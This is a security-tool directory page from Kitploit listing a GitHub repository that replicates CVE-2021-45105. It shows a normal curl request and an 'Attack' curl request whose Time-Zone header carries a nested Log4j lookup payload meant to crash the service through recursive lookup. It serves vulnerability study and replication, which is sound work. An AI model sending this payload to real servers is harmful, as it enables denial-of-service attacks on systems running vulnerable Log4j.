Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-45105 — Replicating CVE-2021-45105 | Kitploit
Tools/GitHubGitHub/tejas-nagchandi/cve-2021-45105
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLog Analysis
GitHubtejas-nagchandi/cve-2021-45105

CVE-2021-45105

Replicating CVE-2021-45105

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

tejas-nagchandi/CVE-2021-45105

Replicating CVE-2021-45105

API

root@kitploit:~
curl -I localhost:8080/currentDateTime -H 'Time-Zone: GMT'

Output:

image

Attack

root@kitploit:~
 curl -I localhost:8080/currentDateTime -H 'Time-Zone: ${${::-${::-$${::-$}}}}'

Output:

image

Logs:

image

Reference:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
Download Tool